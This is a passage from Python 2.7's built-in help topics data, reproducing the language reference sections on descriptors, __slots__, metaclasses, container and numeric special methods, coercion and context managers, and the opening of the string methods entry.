an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n--------------------\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". How\nthe arguments are assembled depends on "a":\n\nDirect Call\n The simplest and least common call is when user code directly\n invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n If binding to a new-style object instance, "a.x" is transformed\n into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n If binding to a new-style class, "A.x" is transformed into the\n call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n If "a" is an instance of "super", then the binding "super(B,\n obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n immediately preceding "B" and then invokes the descriptor with the\n call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non the which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n---------\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n This class variable can be assigned a string, iterable, or sequence\n of strings with variable names used by instances. If defined in a\n new-style class, *__slots__* reserves space for the declared\n variables and prevents the automatic creation of *__dict__* and\n *__weakref__* for each instance.\n\n New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n attribute of that class will always be accessible, so a *__slots__*\n definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n variables not listed in the *__slots__* definition. Attempts to\n assign to an unlisted variable name raises "AttributeError". If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n\n\nCustomizing class creation\n==========================\n\nBy default, new-style classes are constructed using "type()". A class\ndefinition is read into a separate namespace and the value of class\nname is bound to the result of "type(name, bases, dict)".\n\nWhen the class definition is read, if *__metaclass__* is defined then\nthe callable assigned to it will be called instead of "type()". This\nallows classes or functions to be written which monitor or alter the\nclass creation process:\n\n* Modifying the class dictionary prior to the class being created.\n\n* Returning an instance of another class -- essentially performing\n the role of a factory function.\n\nThese steps will have to be performed in the metaclass\'s "__new__()"\nmethod -- "type.__new__()" can then be called from this method to\ncreate a class with different properties. This example adds a new\nelement to the class dictionary before creating the class:\n\n class metacls(type):\n def __new__(mcs, name, bases, dict):\n dict[\'foo\'] = \'metacls was here\'\n return type.__new__(mcs, name, bases, dict)\n\nYou can of course also override other class methods (or add new\nmethods); for example defining a custom "__call__()" method in the\nmetaclass allows custom behavior when the class is called, e.g. not\nalways creating a new instance.\n\n__metaclass__\n\n This variable can be any callable accepting arguments for "name",\n "bases", and "dict". Upon class creation, the callable is used\n instead of the built-in "type()".\n\n New in version 2.2.\n\nThe appropriate metaclass is determined by the following precedence\nrules:\n\n* If "dict[\'__metaclass__\']" exists, it is used.\n\n* Otherwise, if there is at least one base class, its metaclass is\n used (this looks for a *__class__* attribute first and if not found,\n uses its type).\n\n* Otherwise, if a global variable named __metaclass__ exists, it is\n used.\n\n* Otherwise, the old-style, classic metaclass (types.ClassType) is\n used.\n\nThe potential uses for metaclasses are boundless. Some ideas that have\nbeen explored including logging, interface checking, automatic\ndelegation, automatic property creation, proxies, frameworks, and\nautomatic resource locking/synchronization.\n\n\nCustomizing instance and subclass checks\n========================================\n\nNew in version 2.6.\n\nThe following methods are used to override the default behavior of the\n"isinstance()" and "issubclass()" built-in functions.\n\nIn particular, the metaclass "abc.ABCMeta" implements these methods in\norder to allow the addition of Abstract Base Classes (ABCs) as\n"virtual base classes" to any class or type (including built-in\ntypes), including other ABCs.\n\nclass.__instancecheck__(self, instance)\n\n Return true if *instance* should be considered a (direct or\n indirect) instance of *class*. If defined, called to implement\n "isinstance(instance, class)".\n\nclass.__subclasscheck__(self, subclass)\n\n Return true if *subclass* should be considered a (direct or\n indirect) subclass of *class*. If defined, called to implement\n "issubclass(subclass, class)".\n\nNote that these methods are looked up on the type (metaclass) of a\nclass. They cannot be defined as class methods in the actual class.\nThis is consistent with the lookup of special methods that are called\non instances, only in this case the instance is itself a class.\n\nSee also:\n\n **PEP 3119** - Introducing Abstract Base Classes\n Includes the specification for customizing "isinstance()" and\n "issubclass()" behavior through "__instancecheck__()" and\n "__subclasscheck__()", with motivation for this functionality in\n the context of adding Abstract Base Classes (see the "abc"\n module) to the language.\n\n\nEmulating callable objects\n==========================\n\nobject.__call__(self[, args...])\n\n Called when the instance is "called" as a function; if this method\n is defined, "x(arg1, arg2, ...)" is a shorthand for\n "x.__call__(arg1, arg2, ...)".\n\n\nEmulating container types\n=========================\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilar to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent of "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n Called to implement the built-in function "len()". Should return\n the length of the object, an integer ">=" 0. Also, an object that\n doesn\'t define a "__nonzero__()" method and whose "__len__()"\n method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n Called to implement evaluation of "self[key]". For sequence types,\n the accepted keys should be integers and slice objects. Note that\n the special interpretation of negative indexes (if the class wishes\n to emulate a sequence type) is up to the "__getitem__()" method. If\n *key* is of an inappropriate type, "TypeError" may be raised; if of\n a value outside the set of indexes for the sequence (after any\n special interpretation of negative values), "IndexError" should be\n raised. For mapping types, if *key* is missing (not in the\n container), "KeyError" should be raised.\n\n Note: "for" loops expect that an "IndexError" will be raised for\n illegal indexes to allow proper detection of the end of the\n sequence.\n\nobject.__missing__(self, key)\n\n Called by "dict"."__getitem__()" to implement "self[key]" for dict\n subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n Called to implement assignment to "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support changes to the values for keys, or if new keys\n can be added, or for sequences if elements can be replaced. The\n same exceptions should be raised for improper *key* values as for\n the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n Called to implement deletion of "self[key]". Same note as for\n "__getitem__()". This should only be implemented for mappings if\n the objects support removal of keys, or for sequences if elements\n can be removed from the sequence. The same exceptions should be\n raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n This method is called when an iterator is required for a container.\n This method should return a new iterator object that can iterate\n over all the objects in the container. For mappings, it should\n iterate over the keys of the container, and should also be made\n available as the method "iterkeys()".\n\n Iterator objects also need to implement this method; they are\n required to return themselves. For more information on iterator\n objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n Called (if present) by the "reversed()" built-in to implement\n reverse iteration. It should return a new iterator object that\n iterates over all the objects in the container in reverse order.\n\n If the "__reversed__()" method is not provided, the "reversed()"\n built-in will fall back to using the sequence protocol ("__len__()"\n and "__getitem__()"). Objects that support the sequence protocol\n should only provide "__reversed__()" if they can provide an\n implementation that is more efficient than the one provided by\n "reversed()".\n\n New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n Called to implement membership test operators. Should return true\n if *item* is in *self*, false otherwise. For mapping objects, this\n should consider the keys of the mapping rather than the values or\n the key-item pairs.\n\n For objects that don\'t define "__contains__()", the membership test\n first tries iteration via "__iter__()", then the old sequence\n iteration protocol via "__getitem__()", see this section in the\n language reference.\n\n\nAdditional methods for emulation of sequence types\n==================================================\n\nThe following optional methods can be defined to further emulate\nsequence objects. Immutable sequences methods should at most only\ndefine "__getslice__()"; mutable sequences might define all three\nmethods.\n\nobject.__getslice__(self, i, j)\n\n Deprecated since version 2.0: Support slice objects as parameters\n to the "__getitem__()" method. (However, built-in types in CPython\n currently still implement "__getslice__()". Therefore, you have to\n override it in derived classes when implementing slicing.)\n\n Called to implement evaluation of "self[i:j]". The returned object\n should be of the same type as *self*. Note that missing *i* or *j*\n in the slice expression are replaced by zero or "sys.maxsize",\n respectively. If negative indexes are used in the slice, the\n length of the sequence is added to that index. If the instance does\n not implement the "__len__()" method, an "AttributeError" is\n raised. No guarantee is made that indexes adjusted this way are not\n still negative. Indexes which are greater than the length of the\n sequence are not modified. If no "__getslice__()" is found, a slice\n object is created instead, and passed to "__getitem__()" instead.\n\nobject.__setslice__(self, i, j, sequence)\n\n Called to implement assignment to "self[i:j]". Same notes for *i*\n and *j* as for "__getslice__()".\n\n This method is deprecated. If no "__setslice__()" is found, or for\n extended slicing of the form "self[i:j:k]", a slice object is\n created, and passed to "__setitem__()", instead of "__setslice__()"\n being called.\n\nobject.__delslice__(self, i, j)\n\n Called to implement deletion of "self[i:j]". Same notes for *i* and\n *j* as for "__getslice__()". This method is deprecated. If no\n "__delslice__()" is found, or for extended slicing of the form\n "self[i:j:k]", a slice object is created, and passed to\n "__delitem__()", instead of "__delslice__()" being called.\n\nNotice that these methods are only invoked when a single slice with a\nsingle colon is used, and the slice method is available. For slice\noperations involving extended slice notation, or in absence of the\nslice methods, "__getitem__()", "__setitem__()" or "__delitem__()" is\ncalled with a slice object as argument.\n\nThe following example demonstrate how to make your program or module\ncompatible with earlier versions of Python (assuming that methods\n"__getitem__()", "__setitem__()" and "__delitem__()" support slice\nobjects as arguments):\n\n class MyClass:\n ...\n def __getitem__(self, index):\n ...\n def __setitem__(self, index, value):\n ...\n def __delitem__(self, index):\n ...\n\n if sys.version_info < (2, 0):\n # They won\'t be defined if version is at least 2.0 final\n\n def __getslice__(self, i, j):\n return self[max(0, i):max(0, j):]\n def __setslice__(self, i, j, seq):\n self[max(0, i):max(0, j):] = seq\n def __delslice__(self, i, j):\n del self[max(0, i):max(0, j):]\n ...\n\nNote the calls to "max()"; these are necessary because of the handling\nof negative indices before the "__*slice__()" methods are called.\nWhen negative indexes are used, the "__*item__()" methods receive them\nas provided, but the "__*slice__()" methods get a "cooked" form of the\nindex values. For each negative index value, the length of the\nsequence is added to the index before calling the method (which may\nstill result in a negative index); this is the customary handling of\nnegative indexes by the built-in sequence types, and the "__*item__()"\nmethods are expected to do this as well. However, since they should\nalready be doing that, negative indexes cannot be passed in; they must\nbe constrained to the bounds of the sequence before being passed to\nthe "__*item__()" methods. Calling "max(0, i)" conveniently returns\nthe proper value.\n\n\nEmulating numeric types\n=======================\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n\n\nCoercion rules\n==============\n\nThis section used to document the rules for coercion. As the language\nhas evolved, the coercion rules have become hard to document\nprecisely; documenting what one version of one particular\nimplementation does is undesirable. Instead, here are some informal\nguidelines regarding coercion. In Python 3, coercion will not be\nsupported.\n\n* If the left operand of a % operator is a string or Unicode object,\n no coercion takes place and the string formatting operation is\n invoked instead.\n\n* It is no longer recommended to define a coercion operation. Mixed-\n mode operations on types that don\'t define coercion pass the\n original arguments to the operation.\n\n* New-style classes (those derived from "object") never invoke the\n "__coerce__()" method in response to a binary operator; the only\n time "__coerce__()" is invoked is when the built-in function\n "coerce()" is called.\n\n* For most intents and purposes, an operator that returns\n "NotImplemented" is treated the same as one that is not implemented\n at all.\n\n* Below, "__op__()" and "__rop__()" are used to signify the generic\n method names corresponding to an operator; "__iop__()" is used for\n the corresponding in-place operator. For example, for the operator\n \'"+"\', "__add__()" and "__radd__()" are used for the left and right\n variant of the binary operator, and "__iadd__()" for the in-place\n variant.\n\n* For objects *x* and *y*, first "x.__op__(y)" is tried. If this is\n not implemented or returns "NotImplemented", "y.__rop__(x)" is\n tried. If this is also not implemented or returns "NotImplemented",\n a "TypeError" exception is raised. But see the following exception:\n\n* Exception to the previous item: if the left operand is an instance\n of a built-in type or a new-style class, and the right operand is an\n instance of a proper subclass of that type or class and overrides\n the base\'s "__rop__()" method, the right operand\'s "__rop__()"\n method is tried *before* the left operand\'s "__op__()" method.\n\n This is done so that a subclass can completely override binary\n operators. Otherwise, the left operand\'s "__op__()" method would\n always accept the right operand: when an instance of a given class\n is expected, an instance of a subclass of that class is always\n acceptable.\n\n* When either operand type defines a coercion, this coercion is\n called before that type\'s "__op__()" or "__rop__()" method is\n called, but no sooner. If the coercion returns an object of a\n different type for the operand whose coercion is invoked, part of\n the process is redone using the new object.\n\n* When an in-place operator (like \'"+="\') is used, if the left\n operand implements "__iop__()", it is invoked without any coercion.\n When the operation falls back to "__op__()" and/or "__rop__()", the\n normal coercion rules apply.\n\n* In "x + y", if *x* is a sequence that implements sequence\n concatenation, sequence concatenation is invoked.\n\n* In "x * y", if one operand is a sequence that implements sequence\n repetition, and the other is an integer ("int" or "long"), sequence\n repetition is invoked.\n\n* Rich comparisons (implemented by methods "__eq__()" and so on)\n never use coercion. Three-way comparison (implemented by\n "__cmp__()") does use coercion under the same conditions as other\n binary operations use it.\n\n* In the current implementation, the built-in numeric types "int",\n "long", "float", and "complex" do not use coercion. All these types\n implement a "__coerce__()" method, for use by the built-in\n "coerce()" function.\n\n Changed in version 2.7: The complex type no longer makes implicit\n calls to the "__coerce__()" method for mixed-type binary arithmetic\n operations.\n\n\nWith Statement Context Managers\n===============================\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nSpecial method lookup for old-style classes\n===========================================\n\nFor old-style classes, special methods are always looked up in exactly\nthe same way as any other method or attribute. This is the case\nregardless of whether the method is being looked up explicitly as in\n"x.__getitem__(i)" or implicitly as in "x[i]".\n\nThis behaviour means that special methods may exhibit different\nbehaviour for different instances of a single old-style class if the\nappropriate special attributes are set differently:\n\n >>> class C:\n ... pass\n ...\n >>> c1 = C()\n >>> c2 = C()\n >>> c1.__len__ = lambda: 5\n >>> c2.__len__ = lambda: 9\n >>> len(c1)\n 5\n >>> len(c2)\n 9\n\n\nSpecial method lookup for new-style classes\n===========================================\n\nFor new-style classes, implicit invocations of special methods are\nonly guaranteed to work correctly if defined on an object\'s type, not\nin the object\'s instance dictionary. That behaviour is the reason why\nthe following code raises an exception (unlike the equivalent example\nwith old-style classes):\n\n >>> class C(object):\n ... pass\n ...\n >>> c = C()\n >>> c.__len__ = lambda: 5\n >>> len(c)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: object of type \'C\' has no len()\n\nThe rationale behind this behaviour lies with a number of special\nmethods such as "__hash__()" and "__repr__()" that are implemented by\nall objects, including type objects. If the implicit lookup of these\nmethods used the conventional lookup process, they would fail when\ninvoked on the type object itself:\n\n >>> 1 .__hash__() == hash(1)\n True\n >>> int.__hash__() == hash(int)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: descriptor \'__hash__\' of \'int\' object needs an argument\n\nIncorrectly attempting to invoke an unbound method of a class in this\nway is sometimes referred to as \'metaclass confusion\', and is avoided\nby bypassing the instance when looking up special methods:\n\n >>> type(1).__hash__(1) == hash(1)\n True\n >>> type(int).__hash__(int) == hash(int)\n True\n\nIn addition to bypassing any instance attributes in the interest of\ncorrectness, implicit special method lookup generally also bypasses\nthe "__getattribute__()" method even of the object\'s metaclass:\n\n >>> class Meta(type):\n ... def __getattribute__(*args):\n ... print "Metaclass getattribute invoked"\n ... return type.__getattribute__(*args)\n ...\n >>> class C(object):\n ... __metaclass__ = Meta\n ... def __len__(self):\n ... return 10\n ... def __getattribute__(*args):\n ... print "Class getattribute invoked"\n ... return object.__getattribute__(*args)\n ...\n >>> c = C()\n >>> c.__len__() # Explicit lookup via instance\n Class getattribute invoked\n 10\n >>> type(c).__len__(c) # Explicit lookup via type\n Metaclass getattribute invoked\n 10\n >>> len(c) # Implicit lookup\n 10\n\nBypassing the "__getattribute__()" machinery in this fashion provides\nsignificant scope for speed optimisations within the interpreter, at\nthe cost of some flexibility in the handling of special methods (the\nspecial method *must* be set on the class object itself in order to be\nconsistently invoked by the interpreter).\n\n-[ Footnotes ]-\n\n[1] It *is* possible in some cases to change an object\'s type,\n under certain controlled conditions. It generally isn\'t a good\n idea though, since it can lead to some very strange behaviour if\n it is handled incorrectly.\n\n[2] For operands of the same type, it is assumed that if the non-\n reflected method (such as "__add__()") fails the operation is not\n supported, which is why the reflected method is not called.\n', 'string-methods': u'\nString Methods\n**************\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01 012 0123 01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01 012 0123 01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or 